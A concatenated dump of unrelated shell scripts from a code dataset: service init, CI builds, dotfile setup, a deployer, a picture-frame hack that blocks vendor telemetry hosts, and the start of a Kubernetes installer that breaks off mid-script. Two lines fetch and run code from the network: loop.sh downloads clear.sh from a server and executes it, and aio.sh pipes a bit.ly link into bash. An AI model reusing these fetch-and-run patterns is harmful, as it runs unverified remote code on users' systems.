test x"$VERBOSE" = x"no" || log_progress_msg "is not running."
test x"$VERBOSE" = x"no" || log_end_msg 1
exit 0
fi
if status_of_proc -p /var/run/xrdp/xrdp-sesman.pid \
/usr/sbin/xrdp-sesman xrdp-sesman >/dev/null 2>&1; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--name xrdp-sesman --exec /usr/sbin/xrdp-sesman
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp-sesman
fi
rm -f /var/run/xrdp/xrdp-sesman.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman -- $SESMAN_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
fi
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp.pid \
--name xrdp --exec /usr/sbin/xrdp
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp
fi
rm -f /var/run/xrdp/xrdp.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp -- $XRDP_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
esac
# make “/etc/init.d/xrdp status” work for nōn-root
(sleep 3; chmod a+r /var/run/xrdp/*.pid 2>/dev/null) &
exit $rv
| true |
d15e0dafcccfe85c768b72c5aa328ed222b0b165 | Shell | PhilipMassey/bash-scripts | /dir-list.sh | UTF-8 | 526 | 3.75 | 4 | [] | no_license | #!/bin/bash
# List subdirectories (up to two levels deep) of a start directory into
# dir-list.log. Start directory defaults to "." or is taken from $1.
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
START=.
# change your directory to command line if passed
# otherwise use home directory
[ $# -eq 1 ] && START=$1 || :
if [ ! -d "$START" ]
then
echo "$START not a directory!"
exit 1
fi
# use find command to get all subdirs name in DIRS variable
dirs=$(find "$START" -type d | grep -v '^./.*/.*/')
# BUG FIX: the original looped "for adir in dirs", iterating over the
# literal word "dirs" instead of the collected directory names.
while IFS= read -r adir
do
echo "${adir}" >> dir-list.log
done <<< "$dirs"
IFS=$SAVEIFS
| true |
95722af4dd58010700e7fe14cf24462a9e47e894 | Shell | TLLSAIFUL/storage | /contrib/cirrus/build_and_test.sh | UTF-8 | 1,053 | 2.640625 | 3 | [
"MIT",
"Apache-2.0"
] | permissive | #!/bin/bash
# CI driver: build containers/storage binaries and run the test matrix
# across storage drivers. Aborts on the first failing step (set -e).
set -e
# lib.sh presumably defines showrun, $GOSRC and $OS_RELEASE_ID — the
# helpers used throughout below (TODO confirm against lib.sh).
source $(dirname $0)/lib.sh
cd $GOSRC
make install.tools
showrun make local-binary
showrun make local-cross
showrun make local-test-unit
# TODO: Some integration tests fail on Fedora
if [[ "$OS_RELEASE_ID" != "fedora" ]]; then
showrun make STORAGE_DRIVER=overlay local-test-integration
fi
# overlay via fuse-overlayfs, with and without whiteout support.
showrun make STORAGE_DRIVER=overlay STORAGE_OPTION=overlay.mount_program=/usr/bin/fuse-overlayfs local-test-integration
showrun make STORAGE_DRIVER=overlay FUSE_OVERLAYFS_DISABLE_OVL_WHITEOUT=1 STORAGE_OPTION=overlay.mount_program=/usr/bin/fuse-overlayfs local-test-integration
showrun make STORAGE_DRIVER=vfs local-test-integration
# aufs is only available on Ubuntu kernels.
if [[ "$OS_RELEASE_ID" == "ubuntu" ]]; then
showrun make STORAGE_DRIVER=aufs local-test-integration
fi
# TODO: Requires partitioning of $(cat /root/second_partition_ready) device after running
# https://github.com/containers/libpod/blob/v1.6.2/contrib/cirrus/add_second_partition.sh
#
#showrun make STORAGE_DRIVER=devicemapper STORAGE_OPTION=dm.directlvm_device=/dev/abc local-test-integration
| true |
060e1621a2c497c9ed5bab97ef4693f3d9d0c5a3 | Shell | timausk/dotfiles | /scripts/linux/setup.sh | UTF-8 | 916 | 2.90625 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# setup.sh
#
# setup a new LINUX machine
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Run from the script's own directory so the relative paths below work.
cd "$(dirname "${BASH_SOURCE[0]}")" && . "../helper.sh"
# setup SSH
# i downloaded and copied files, but guess we should gen a new pair
# copy downloaded files
# cp ~/Downloads/id_rsa.pub ~/.ssh/
# correct permission
# sudo chmod 600 ~/.ssh/id_rsa
# update packagelist upfront
sudo apt update;
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing packages
./packages.sh
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing oh-my-zsh
./../common/oh_my_zsh.sh
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing Node Version Manager
./../common/nvm.sh
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing sdkman
./../common/sdkman.sh
| true |
67ab48b79c2963fd35bc12f3edd9a2c354a76999 | Shell | ErasmusMC-Bioinformatics/shm_csr | /change_o/makedb.sh | UTF-8 | 529 | 3.1875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Run Change-O's MakeDb.py (imgt mode) and move the resulting database
# to the requested location.
#
# Arguments:
#   $1 - input file/archive for MakeDb.py
#   $2 - "true" to pass --noparse
#   $3 - "true" to pass --scores
#   $4 - "true" to pass --regions
#   $5 - destination path for the generated .tab database
input=$1
noparse=$2
scores=$3
regions=$4
output=$5
# Translate "true"/anything-else flag values into MakeDb.py options.
if [ "true" == "$noparse" ] ; then
noparse="--noparse"
else
noparse=""
fi
if [ "true" == "$scores" ] ; then
scores="--scores"
else
scores=""
fi
if [ "true" == "$regions" ] ; then
regions="--regions"
else
regions=""
fi
# mkdir -p: tolerate a stale outdir left behind by an earlier run.
mkdir -p "$PWD/outdir"
echo "makedb: $PWD/outdir"
# The flag variables stay unquoted on purpose: empty ones must vanish.
MakeDb.py imgt -i "$input" --outdir "$PWD/outdir" --outname output $noparse $scores $regions
mv "$PWD/outdir/output_db-pass.tab" "$output"
rm -rf "$PWD/outdir/"
| true |
6e646df8dbf165ddfc9308b61b82799f801d3dbf | Shell | elmoremh/HD1-HD2-natural-history | /echo_filenames_cat_headers.sh | UTF-8 | 132 | 3.03125 | 3 | [] | no_license | #!/bin/bash
### for each fasta file in directory, echo name of file and cat contents
for fa in *.fasta; do
    # Guard against an unmatched glob: without nullglob, "*.fasta"
    # stays literal and cat would error on a nonexistent file.
    [ -e "$fa" ] || continue
    echo "$fa"
    cat "$fa"
done
f8b97010459a7e45dffe6015cfc93d6b3360a346 | Shell | kasperski95/bank-system | /Main/Home/Transactions/view.sh | UTF-8 | 726 | 3.546875 | 4 | [] | no_license | #!/bin/bash
# Transactions submenu of the banking app's home screen (UI in Polish).
tnst_title="TRANSAKCJE"
# Directory containing this script; fall back to $PWD when the
# BASH_SOURCE path has no directory component.
tnst_dir="${BASH_SOURCE%/*}"
if [[ ! -d "$tnst_dir" ]]; then tnst_dir="$PWD"; fi
# Pull in the action handlers (tnst_handle*Transfer) used below.
. $tnst_dir/controller.sh
# Draw the transactions screen, read the user's menu choice, and
# dispatch it. Relies on ui_header/ui_line and $home_title defined by
# the surrounding application.
tnst_show() {
    local action
    ui_header "$home_title" "$tnst_title"
    __tnst_showMenu && echo ""
    ui_line
    # Prompt (Polish): "Choose an action: "
    read -p "Wybierz akcję: " action
    __tnst_handleAction $action
    return 0
}
# Render the transactions menu entries (labels stay in Polish, like the
# rest of the UI). Always succeeds.
__tnst_showMenu() {
    local entry
    for entry in \
        "1 - Przelew zwykły" \
        "2 - Przelew ekspress" \
        "3 - Przelew walutowy" \
        "0 - Powrót"
    do
        echo "$entry"
    done
    return 0
}
# Dispatch the chosen menu action. Any unrecognised choice (including
# "0"/empty) just flags home_skipPause so the caller skips its pause.
__tnst_handleAction() {
    local choice=$1
    if [[ "$choice" == "1" ]]; then
        tnst_handleTransfer
    elif [[ "$choice" == "2" ]]; then
        tnst_handleExpressTransfer
    elif [[ "$choice" == "3" ]]; then
        tnst_handleMonetaryTransfer
    else
        home_skipPause=true
    fi
    return 0
}
db736c3ef50761e087db2c1110513fb7502b5b9c | Shell | t-hiro23/control_repository | /create/fork_into_user.sh | SHIFT_JIS | 476 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# usage
if test $# -ne 4; then
echo "usage: ${0} <user> <pass> <fork_target_rep_owner> <fork_target_rep>"
exit 0
fi
# load the shared settings (expected to define GITHUB_API, among others)
TOOL_ROOT_DIR=`which ${0}`
. ${TOOL_ROOT_DIR%/*/*}/.setting/setting.sh
# basic settings; ${n:?} aborts when the argument is missing or empty
GITHUB_USER=${1:?}
GITHUB_PASS=${2:?}
# fork the target repository into the user's account via the GitHub API
GITHUB_SRC_REP_OWNER="${3:?}"
GITHUB_SRC_REP="${4:?}"
curl -u "${GITHUB_USER}:${GITHUB_PASS}" -X POST ${GITHUB_API}/repos/${GITHUB_SRC_REP_OWNER}/${GITHUB_SRC_REP}/forks
| true |
5a778bb9c4395d4336c4e54ca307945e7fcaa8c0 | Shell | you-li-nu/IC3ref | /aiger/configure | UTF-8 | 1,587 | 3.953125 | 4 | [
"BSD-3-Clause",
"MIT"
] | permissive | #!/bin/sh
# Default build mode; the -g option below switches on a debug build.
debug=no
# Print an error message to stderr and abort the configure run.
die () {
  printf '%s\n' "*** configure: $*" >&2
  exit 1
}
# Show the accepted invocation forms, then terminate successfully.
usage () {
  printf '%s\n' "usage: [CC=compile] [CFLAGS=cflags] configure [-h][-hg]"
  exit 0
}
# Emit a non-fatal diagnostic on stderr.
warning () {
  printf '[configure] warning: %s\n' "$*" >&2
}
# Emit a progress message on stderr (stdout stays clean for tooling).
message () {
  printf '[configure] %s\n' "$*" >&2
}
# Parse command-line options (-h for help, -g for a debug build).
while [ $# -gt 0 ]
do
case $1 in
-h|--help) usage;;
-g) debug=yes;;
*) die "invalid command line option '$1' (try '-h')";;
esac
shift
done
# Default the compiler to gcc unless the caller exported CC.
if [ x"$CC" = x ]
then
message "using gcc as default compiler"
CC=gcc
else
message "using $CC as compiler"
fi
# Pick compilation flags: honour an exported CFLAGS, otherwise choose
# per-compiler defaults driven by the -g (debug) switch.
if [ x"$CFLAGS" = x ]
then
message "using default compilation flags"
case x"$CC" in
xgcc*)
CFLAGS="-Wall"
if [ $debug = yes ]
then
CFLAGS="-g"
else
CFLAGS="-O3 -DNDEBUG"
fi
;;
*)
if [ $debug = yes ]
then
CFLAGS="-g"
else
CFLAGS="-O -DNDEBUG"
fi
;;
esac
else
message "using custom compilation flags"
fi
# Enable the 'aigbmc' target only when a built PicoSAT checkout is
# available next to this project (header and object file present).
if [ -d ../picosat ]
then
if [ -f ../picosat/picosat.h ]
then
if [ -f ../picosat/picosat.o ]
then
AIGBMCTARGET="aigbmc"
message "using 'picosat.h' and 'picosat.o' in '../picosat/' for 'aigbmc'"
else
warning \
"can not find '../picosat/picosat.o' object file (no 'aigbmc' target)"
fi
else
warning "can not find '../picosat/picosat.h' header (no 'aigbmc' target)"
fi
else
warning "can not find '../picosat' directory (no 'aigbmc' target)"
fi
message "compiling with: $CC $CFLAGS"
# Instantiate the makefile template with the chosen settings.
rm -f makefile
sed \
-e "s/@CC@/$CC/" \
-e "s/@CFLAGS@/$CFLAGS/" \
-e "s/@AIGBMCTARGET@/$AIGBMCTARGET/" \
makefile.in > makefile
| true |
46771d2c7708b728e5217a7b8994746c6176f2cb | Shell | kirisky/EnvScripts | /installationOnFedora_whiptail.sh | UTF-8 | 2,094 | 3.921875 | 4 | [] | no_license | #/bin/sh
############################# initializing global variables ############################################################
#
# Set a path for shell config file
#
shellConfigFile=~/.zshrc
#
# Fetch paths for changing the directory
#
currentPath=`pwd`
basePath="./fedora"
# string for DOCKER_HOST
dockerHostString="export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock"
#
# Acquire scripts
#
scripts=($(ls $basePath | grep "\.sh"))
#
# Acquire current user's bin folder
#
userBinFolder=~/bin
#
# Path for zsh shell
#
zshShellPath="/usr/bin/zsh"
#
# Path for oh-my-zsh
#
ohMyZshFolderPath=~/.oh-my-zsh
############################# loading requirements #######################################################################
#
# load shell colors
#
source ./common/16Color
############################# checking if zsh and oh-my-zsh has been installed on this machine #########################
source ./common/zsh_omz_installation
check_zsh_and_omz
############################# Launch Whiptail Dialog #######################################################################
#
# Launch whiptail dialog and get selected options
#
# Reference
# https://saveriomiroddi.github.io/Shell-scripting-adventures-part-3/#check-list
#
if [ ! -f "/usr/bin/whiptail" ]; then
echo "Whiptail does not exist on this machine. Will install it on this machine."
sudo dnf -y install newt
fi
title='Fedora Dev-Env Installation'
message='What apps do you want to install?'
scriptIndex=1
whiptailString=""
# Build the "<tag> <item> OFF" triplets whiptail --checklist expects.
for element in "${scripts[@]}"
do
whiptailString+="$scriptIndex $element OFF "
scriptIndex=$((scriptIndex + 1))
done
# $whiptailString must stay unquoted: it word-splits into the triplets.
# fd juggling (3>&1 1>&2 2>&3) captures whiptail's selection output.
selected_options=($(whiptail --separate-output --title "$title" --checklist "$message" 20 36 10 $whiptailString 3>&1 1>&2 2>&3))
tempArray=()
# Map the selected 1-based tags back to script names.
for i in "${!selected_options[@]}"
do
tempArray+=("${scripts[${selected_options[i]}-1]}")
done
scripts=("${tempArray[@]}")
############################# executing logic ##########################################################################
#
# Execute the scripts by the executor file
#
source ./common/executor
| true |
0f545ca8db90e4f14f0378660ff19d6b8a9e1d42 | Shell | radiobuddha/do_vagrantfile_rb | /bootstrap.sh | UTF-8 | 1,354 | 3.484375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
#to start new server: vagrant up --provider=digital_ocean
#to run bootstrap.sh: vagrant reload --provision
# Lockfile marking that the one-time package installation already ran.
FILE=".initial_vagrant_setup.lock"
if [ -f $FILE ];
then
echo "Software already installed."
else
echo "Installing Radio Buddha's software ..."
echo "Updating system ..."
apt-get update
echo "Upgrading system ..."
apt-get -y upgrade
echo "Installing lame, mpd, mpc ncmpcpp, git ..."
apt-get -y install lame
apt-get -y install mpd
apt-get -y install mpc
apt-get -y install ncmpcpp
apt-get -y install git
echo "Writing initial setup lockfile"
touch $FILE
echo "Rebooting system ..."
# NOTE: reboot terminates this provisioning run; the steps below only
# execute on a later run, once the lockfile exists.
reboot now
fi
# Fetch or refresh the MPD configuration repository.
RB_GIT_DIR="radio_buddha_mpd_confs"
if [ -d $RB_GIT_DIR ];
then
echo "Updating $RB_GIT_DIR"
cd radio_buddha_mpd_confs
git pull
cd ..
else
echo "Cloning $RB_GIT_DIR"
git clone https://github.com/kylepjohnson/radio_buddha_mpd_confs.git
fi
echo "Copying playlist and mpd.conf ..."
cp -rf radio_buddha_mpd_confs/playlists/* /var/lib/mpd/playlists
cp -f radio_buddha_mpd_confs/mpd.conf /etc/mpd.conf
#transfer audio ex
#rsync -avz root@192.241.186.239:/var/lib/mpd/music/* /var/lib/mpd/music
echo "Restarting MPD ..."
service mpd restart
echo "Starting playlist ..."
cd /var/lib/mpd/playlists
mpc load master.m3u
mpc repeat on
mpc play
cd /root
| true |
87d6a6a9404daa4b81b85d638dc47780d5964245 | Shell | dacandia/Exercise08LinuxShell | /script.sh | UTF-8 | 802 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# Given three integers (X, Y, and Z) representing the three sides of a triangle,
# identify whether the triangle is Scalene, Isosceles, or Equilateral.

# Classify a triangle from its three side lengths and print the result.
classify_triangle() {
local a=$1 b=$2 c=$3
# The triangle inequality must hold strictly: a degenerate "triangle"
# whose two sides sum exactly to the third is not a triangle.
# (BUG FIX: the original used -lt, so degenerate inputs such as
# 1 2 3 were classified as SCALENE/ISOSCELES.)
if [ $((a + b)) -le "$c" ] || [ $((b + c)) -le "$a" ] || [ $((c + a)) -le "$b" ]; then
echo "It's not a Triangle"
elif [ "$a" -eq "$b" ] && [ "$b" -eq "$c" ]; then
echo "EQUILATERAL"
elif [ "$a" -eq "$b" ] || [ "$b" -eq "$c" ] || [ "$c" -eq "$a" ]; then
echo "ISOSCELES"
else
echo "SCALENE"
fi
}

echo "Input first side: "
read sideOne
echo "Input second side: "
read sideTwo
echo "Input third side: "
read sideThree
# Robustness: reject empty or non-numeric input instead of crashing
# inside arithmetic expansion.
case "$sideOne$sideTwo$sideThree" in
''|*[!0-9]*) echo "It's not a Triangle" ;;
*) classify_triangle "$sideOne" "$sideTwo" "$sideThree" ;;
esac
| true |
3f070b5871707196f41576366500735fd6cc097c | Shell | xiangys0134/deploy | /jenkins/rpm包自动打包/xone/scada-task-update.sh | UTF-8 | 2,170 | 3.65625 | 4 | [] | no_license | #!/bin/bash
# yousong.xiang 250919938@qq.com
# 2019.5.10
# v1.0.1
# scada-task package update (deployment) script
# Load the login environment when available (Jenkins runs non-login shells).
[ -f /etc/profile ] && . /etc/profile
base_dir=`pwd`
# Release trees are unpacked under path_dir; web_site_dir holds the
# "scada-task" symlink that points at the active release.
path_dir=/data/code
web_site_dir=/data
host_user=root
# Kill the running scada-task process, if any.
# Returns 2 when no scada-task process is found.
function server_stop() {
task_pid=`ps -ef|grep scada-task |egrep -v "grep|$0|scada-task-update"|awk '{print $2}'`
# BUG FIX: the original tested the misspelled variable "task_id",
# which is always empty, so this branch always fired and the server
# was never actually killed.
if [ -z "${task_pid}" ]; then
echo "SERVER is stopped"
return 2
fi
sudo kill -9 ${task_pid}
}
# Start the scada-task server via its run.sh unless it is already
# running. Always returns 0.
function server_start() {
task_pid=`ps -ef|grep scada-task |egrep -v "grep|$0|scada-task-update"|awk '{print $2}'`
if [ -n "${task_pid}" ]; then
echo "SERVER is running"
return 0
else
sudo ${web_site_dir}/scada-task/bin/run.sh start
echo "SERVER is starting"
return 0
fi
}
# Deploy the newest scada-task release: unpack the tarball staged by
# Jenkins ($JOB_NAME), carry over the live config, and repoint the
# ${web_site_dir}/scada-task symlink at the new version.
function scada_update() {
#source_pkg=$1
cd /tmp/${JOB_NAME}_tmp
tar_name=`ls *tar.gz 2>/dev/null |awk '{print $0}'`
if [ -z "${tar_name}" ]; then
# (Chinese) "failed to obtain the update package"
echo "更新包获取失败"
exit 4
fi
# Release directory name = tarball name without the .tar.gz suffix.
version=${tar_name%%.tar.gz}
#echo "${version}"
#tar -zxvf scada-task.15.tar.gz -C /tmp/aaa
sudo tar -zxf ${tar_name} -C ${path_dir}
if [ $? -ne 0 ]; then
echo "Decompress failed"
exit 3
fi
#copy config file
# Preserve the currently deployed configuration in the new release.
if [ -d ${web_site_dir}/scada-task/config ]; then
sudo /bin/cp -rf ${web_site_dir}/scada-task/config ${path_dir}/${version}/
if [ $? -ne 0 ]; then
echo "configs copy failed"
exit 7
fi
else
# (Chinese) "please adjust the config files at the path below"
echo "请修改相关配置文件,路径:${web_site_dir}/scada-task/config"
fi
# Atomically-ish swap the active release symlink.
cd ${web_site_dir}
[ -L scada-task -o -f scada-task ] && sudo rm -rf scada-task
sudo ln -s ${path_dir}/${version} scada-task
if [ $? -ne 0 ]; then
echo "link failed"
exit 4
fi
sudo mkdir -p ${web_site_dir}/scada-task/logs/scada-task
echo "sudo chown -R ${host_user}. ${path_dir}/${version}"
sudo chown -R ${host_user}. ${path_dir}/${version}
echo "sudo chown -R ${host_user}. ${web_site_dir}/scada-task"
sudo chown -R ${host_user}. ${web_site_dir}/scada-task
# (Chinese) "deployment finished"
echo "部署完成"
}
# Main sequence: stop the old server, swap in the new release, restart.
server_stop
scada_update
server_start
| true |
fee97b3ddbcc44ec73b5f04df1d554dcc9667890 | Shell | INT3hex/PictureFrameMod | /files/loop.sh | UTF-8 | 5,548 | 2.59375 | 3 | [] | no_license | #!/system/bin/sh
echo "start"
# Digital picture frame sync daemon: pulls images/config from a LAN web
# server, blocks the vendor's phone-home hosts, and restarts the
# slideshow. All progress is appended to LOGFILE.
LOGFILE=/sdcard/FamilyAlbum/local/log.txt
IMAGEDIR=/sdcard/FamilyAlbum/local
MUTEX=/mnt/obb/loop.run
# URL to pictures
URL=http://192.168.178.200/cpf8a1/
SCRIPT=clear.sh
CONFIG=config.txt
echo "$(date) " >> $LOGFILE
echo "$(date) [$BASHPID] starting /data/user/hack/loop.sh" >> $LOGFILE
# Mutexsection
# A file-based mutex: the presence of $MUTEX means another instance of
# the loop is already running (or was requested to keep running).
if [ -f "$MUTEX" ];
then
echo "Mutex $MUTEX is found, loop already running"
echo "$(date) Mutex $MUTEX is found, loop already running - exit this!" >> $LOGFILE
exit
else
echo "Mutex $MUTEX is not found"
echo "$(date) Mutex $MUTEX is not found, start loop" >> $LOGFILE
fi
echo "Running Main! Mutex BASHPID: $BASHPID" > $MUTEX
# block network communication
# check with: ip route oder /data/user/hack/busybox-armv7lv1_31 route
/data/user/hack/busybox-armv7lv1_31 route add -host 52.41.236.57 reject
/data/user/hack/busybox-armv7lv1_31 route add -host 8.211.36.31 reject
/data/user/hack/busybox-armv7lv1_31 route add -host umeng.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host alog-g.umeng.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host oc.umeng.com.gds.alibabadns.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host alibabadns.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host b.yahoo.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host yahoo.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host n.shifen.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host shifen.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host r6.mo.n.shifen.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host ias.tencent-cloud.net reject
/data/user/hack/busybox-armv7lv1_31 route add -host tencent-cloud.net reject
/data/user/hack/busybox-armv7lv1_31 route add -host ec2-52-41-236-57.us-west-2.compute.amazonaws.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host compute.amazonaws.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host fota5.adup.cn reject
/data/user/hack/busybox-armv7lv1_31 route add -host adup.cn reject
/data/user/hack/busybox-armv7lv1_31 route add -host rqd.uu.qq.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host hwfotadown.mayitek.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host newupdater.api.eaglenet.cn reject
echo "$(date) blackhole hosts added..." >> $LOGFILE
echo "Waiting initial loop..."
echo "$(date) Waiting initial loop..." >> $LOGFILE
sleep 60
# Launch the gallery app and simulate remote-control key presses to
# kick off the slideshow (key codes: 21=left 22=right 20=down 23=ok).
am start -n "com.allwinner.digitalphotoframe.showallapp/.MainActivity"
am start -n "com.allwinner.theatreplayer.album/.ui.GalleryActivity"
sleep 1
input keyevent 21
input keyevent 21
input keyevent 21
input keyevent 21
sleep 1
input keyevent 22
input keyevent 22
input keyevent 20
input keyevent 23
# NTP Set Time
echo "$(date) Retreiving time from pool.ntp.org" >> $LOGFILE
/data/user/hack/busybox-armv7lv1_31 ntpd -d -n -q -p pool.ntp.org
# Download Config
echo "Retreiving $URL$CONFIG"
echo "$(date) Retreiving $URL$CONFIG" >> $LOGFILE
rm $IMAGEDIR/$CONFIG
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL$CONFIG
# Read Config
# First line of config.txt is the loop interval in seconds
# (default 120; 1200 when the download failed / file is empty).
line=""
TIMEOUT=120
input=$IMAGEDIR/$CONFIG
echo "$(date) read $input" >> $LOGFILE
read -r line < "$input"
if [ -z "$line" ];
then
TIMEOUT=1200
else
TIMEOUT=$line
fi
echo "$(date) Initial finished. Going to loop in $TIMEOUT..." >> $LOGFILE
# Loopsection
# Keep syncing until the mutex file is removed by hand.
while [ -f "$MUTEX" ];
do
echo "$(date) Sleeping for $TIMEOUT"
echo "$(date) Sleeping for $TIMEOUT" >> $LOGFILE
sleep $TIMEOUT
# Download Shell-Skript
# Fetch and execute an optional maintenance script from the server.
echo "Retreiving $URL$SCRIPT"
echo "$(date) Retreiving $URL$SCRIPT" >> $LOGFILE
rm $IMAGEDIR/$SCRIPT
rm /data/user/hack/$SCRIPT
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL$SCRIPT
cp $IMAGEDIR/$SCRIPT /data/user/hack/$SCRIPT
chmod 755 /data/user/hack/$SCRIPT
if [ -e "/data/user/hack/$SCRIPT" ];
then
echo "$(date) Executing copied /data/user/hack/$SCRIPT" >> $LOGFILE
sh /data/user/hack/$SCRIPT
fi
# Download Index
# busybox wget (with repaired /etc/resolv.conf for busybox nslookup!!)
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL
# get hrefs/jpg from index.html and cut everything out
grep -Eoi '<a href="[^>]+jpg"><img' $IMAGEDIR/index.html | grep -Eoi '"[^>]+jpg"' | busybox tr -d '"' > $IMAGEDIR/imagelist.txt
rm $IMAGEDIR/index.html
# Download Images
line=""
input=$IMAGEDIR/imagelist.txt
while IFS= read -r line
do
echo "Retreiving $URL$line"
echo "$(date) Retreiving $URL$line" >> $LOGFILE
/data/user/hack/busybox-armv7lv1_31 wget -P $IMAGEDIR $URL$line
done < "$input"
# Reset ActivityManager
# Restart Android's UI so the gallery re-reads the image directory.
echo "Restarting ActivityManager"
echo "$(date) Restarting ActivityManager" >> $LOGFILE
am restart
sleep 45
am start -n "com.allwinner.digitalphotoframe.showallapp/.MainActivity"
am start -n "com.allwinner.theatreplayer.album/.ui.GalleryActivity"
# check IR/Key-Inputs with getevent -c 2
sleep 1
input keyevent 21
input keyevent 21
input keyevent 21
input keyevent 21
sleep 1
input keyevent 22
input keyevent 22
input keyevent 20
input keyevent 23
echo "$(date) SlideShow should be started..." >> $LOGFILE
PROCESSPID=$(busybox pidof -s dhcpcd)
if [ -z "$PROCESSPID" ];
then
echo "process $PROCESSPID not running"
else
echo "process $PROCESSPID running"
fi
echo "$(date) looping loop.sh" >> $LOGFILE
done
echo "$(date) ending loop.sh - should never come to here..." >> $LOGFILE
echo "$(date) Manual Mutex-stop signal set. Exiting..." >> $LOGFILE | true
d19f48446b7b0657c73ba933c586a5b9f42bcfa2 | Shell | belvinlabs/proost-app | /server/migrate.sh | UTF-8 | 720 | 3.53125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Print the given message (or a default one) to stdout in bold red,
# resetting the terminal colour afterwards.
function cwarn() {
    local color='\033[01;31m' # bold red
    local reset='\033[00;00m' # normal white
    local msg="${*:-${reset}Error: No message passed}"
    echo -e "${color}${msg}${reset}"
}
# Warn that Alembic's autogenerate cannot detect every model change
# before generating the migration. (FIX: corrected the typos
# "int hte" -> "in the" and "inforation" -> "information".)
cwarn "The migrate functionality picks up most of the changes made "\
"to models, but not all changes to models are detected. Please "\
"review your changes in the migrations folder and if no new "\
"revision is made, you can use revision.sh to generate one manually."\
"\nMore information on what changes can be detected: "\
"https://alembic.sqlalchemy.org/en/latest/autogenerate.html#what-does"\
"-autogenerate-detect-and-what-does-it-not-detect"
# Point Flask at the application module and generate a migration.
export FLASK_APP=src/main
flask db migrate
7d4265ae033278b9ba91f155032ee3c34db7ae05 | Shell | Satyricon/simple-node-backend | /test/test.sh | UTF-8 | 251 | 2.984375 | 3 | [] | no_license | #!/bin/bash
# Smoke test: fetch the LoadBalancer IP of the first Service in the
# "dev" namespace and expect an HTTP 200 from it.
ip=$(kubectl get svc -n dev -o json | jq -r .items[0].status.loadBalancer.ingress[0].ip)
# -s -o /dev/null -w "%{http_code}": print only the status code.
result=$(curl -s -o /dev/null -w "%{http_code}" $ip)
if [ $result -eq 200 ]
then
echo "All is fine"
exit 0
else
echo "Test fails"
exit 1
fi
| true |
d06e64e5e29e2fa89789b06ebd349c8264efd590 | Shell | electrocucaracha/krd | /aio.sh | UTF-8 | 4,182 | 3.46875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# SPDX-license-identifier: Apache-2.0
##############################################################################
# Copyright (c) 2018
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
set -o errexit
set -o nounset
set -o pipefail
# KRD_DEBUG=true traces every command and propagates debug to pkg-mgr.
if [ "${KRD_DEBUG:-false}" == "true" ]; then
set -o xtrace
export PKG_DEBUG=true
fi
# All-in-One deployments can't take advantage of image caching.
export KRD_DOWNLOAD_LOCALHOST=false
krd_actions_list=${KRD_ACTIONS_LIST:-install_k8s}
# Validators
# 1) The current user must have passwordless sudo (sudo -n fails fast).
if ! sudo -n "true"; then
echo ""
echo "passwordless sudo is needed for '$(id -nu)' user."
echo "Please fix your /etc/sudoers file. You likely want an"
echo "entry like the following one..."
echo ""
echo "$(id -nu) ALL=(ALL) NOPASSWD: ALL"
exit 1
fi
# 2) ...but the script itself must not run as root.
if [[ $(id -u) -eq 0 ]]; then
echo ""
echo "This script needs to be executed without using sudo command."
echo ""
exit 1
fi
# Install dependencies
# NOTE: Shorten link -> https://github.com/electrocucaracha/pkg-mgr_scripts
curl -fsSL http://bit.ly/install_pkg | PKG_UPDATE=true PKG_COMMANDS_LIST="hostname,wget,git" bash
# Validating local IP addresses in no_proxy environment variable
if [[ ${NO_PROXY+x} == "x" ]]; then
